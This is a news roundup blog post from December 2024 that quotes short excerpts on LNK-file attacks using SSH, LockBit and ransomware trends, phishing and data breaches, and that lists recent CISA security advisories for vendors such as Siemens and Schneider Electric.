Windows TCO, Security, and CISA

posted by Roy Schestowitz on Dec 20, 2024

• Windows TCO

  • Cyble Inc ☛ LNK Files And SSH Commands: A New Cyber Attack Trend In 2024

    In addition to using SCP for file downloads, threat actors have also employed SSH commands to indirectly execute malicious PowerShell or CMD commands through the LNK file. These commands can be configured to load and execute additional payloads or exploit other system utilities.

    One such attack observed by CRIL involved a malicious LNK file that used an SSH command to trigger a PowerShell script, which then called mshta.exe to download a malicious payload from a remote URL. The execution of the malicious PowerShell script led to the deployment of a harmful file on the compromised system.

    Furthermore, attackers have also leveraged cmd.exe and rundll32 commands to load malicious DLL files and execute them, further complicating detection efforts. In one such case, the attackers used the LNK file to execute a series of commands that ultimately launched a PDF file containing a lure document, which, when opened, triggered the execution of malicious code.

  • Cyble Inc ☛ LockBit Ransomware Group Plots Comeback With 4.0 Release

    The launch of LockBit 4.0 will come almost a year after a global law enforcement action disrupted its operations and led to the recovery of nearly 7,000 decryption keys. RansomHub has since emerged as the most active ransomware group.

  • IT Wire ☛ iTWire - Dragos Industrial Ransomware Analysis: Q3 2024

    A critical shift occurred this quarter as dominant groups like LockBit faced significant setbacks following coordinated international law enforcement actions, including Operation Cronos, which dismantled key infrastructure components. This led to a decline in LockBit's activities and forceransomd affiliates, such as Velvet Tempest, to transition to other groups like RansomHub.

    The ransomware-as-a-service (RaaS) model continued to mature, relying increasingly on IABs to exploit vulnerabilities, misconfigurations, and stolen credentials that facilitated entry into targeted environments. This initial access enabled ransomware groups to scale their operations by focusing on payload deployment and extortion strategies. This industrialisation of ransomware has continuously lowered barriers to entry for new actors, fostering a competitive and dynamic threat environment. This quarter was no different.

• CISA

  • CISA ☛ 2024-12-12 [Older] Apple Releases Security Updates for Multiple Products

  • CISA ☛ 2024-12-10 [Older] Adobe Releases Security Updates for Multiple Products

  • CISA ☛ 2024-12-10 [Older] Ivanti Releases Security Updates for Multiple Products

  • CISA ☛ 2024-12-10 [Older] Microsoft Releases December 2024 Security Updates

  • CISA ☛ 2024-12-13 [Older] CISA Adds One Known Exploited Vulnerability to Catalog

  • CISA ☛ 2024-12-13 [Older] CISA and EPA Release Joint Fact Sheet Detailing Risks Internet-Exposed HMIs Pose to WWS Sector

  • CISA ☛ 2024-12-12 [Older] CISA Releases Ten Industrial Control Systems Advisories

  • CISA ☛ 2024-12-12 [Older] Siemens CPCI85 Central Processing/Communication

  • CISA ☛ 2024-12-12 [Older] Siemens Engineering Platforms

  • CISA ☛ 2024-12-12 [Older] Siemens RUGGEDCOM ROX II

  • CISA ☛ 2024-12-12 [Older] Siemens Parasolid

  • CISA ☛ 2024-12-12 [Older] Siemens Engineering Platforms

  • CISA ☛ 2024-12-12 [Older] Siemens Simcenter Femap

  • CISA ☛ 2024-12-12 [Older] Siemens Solid Edge SE2024

  • CISA ☛ 2024-12-12 [Older] Siemens COMOS

  • CISA ☛ 2024-12-12 [Older] Siemens Teamcenter Visualization

  • CISA ☛ 2024-12-12 [Older] Siemens SENTRON Powercenter 1000

  • CISA ☛ 2024-12-10 [Older] CISA Adds One Known Exploited Vulnerability to Catalog

  • CISA ☛ 2024-12-10 [Older] CISA Releases Seven Industrial Control Systems Advisories

  • CISA ☛ 2024-12-10 [Older] MOBATIME Network Master Clock

  • CISA ☛ 2024-12-10 [Older] Schneider Electric EcoStruxure Foxboro DCS Core Control Services

  • CISA ☛ 2024-12-10 [Older] Schneider Electric FoxRTU Station

  • CISA ☛ 2024-12-10 [Older] National Instruments LabVIEW

  • CISA ☛ 2024-12-10 [Older] Horner Automation Cscape

  • CISA ☛ 2024-12-10 [Older] Rockwell Automation Arena

• Integrity/Availability/Authenticity

  • Krebs On Security ☛ Web Hacking Service ‘Araneida’ Tied to Turkish IT Firm

    Researchers at Silent Push say despite Araneida using a seemingly endless supply of proxies to mask the true location of its users, it is a fairly “noisy” scanner that will kick off a large volume of requests to various API endpoints, and make requests to random URLs associated with different content management systems.

  • EFF ☛ The Breachies 2024: The Worst, Weirdest, Most Impactful Data Breaches of the Year

    Every year, countless emails hit our inboxes telling us that our personal information was accessed, shared, or stolen in a data breach. In many cases, there is little we can do. Most of us can assume that at least our phone numbers, emails, addresses, credit card numbers, and social security numbers are all available somewhere on the [Internet].

  • The Register UK ☛ Crooks use Docusign lures to attempt Azure account takeovers

    Unknown criminals went on a phishing expedition that targeted about 20,000 users across the automotive, chemical and industrial compound manufacturing sectors in Europe, and tried to steal account credentials and then hijack the victims' Microsoft Azure cloud infrastructure.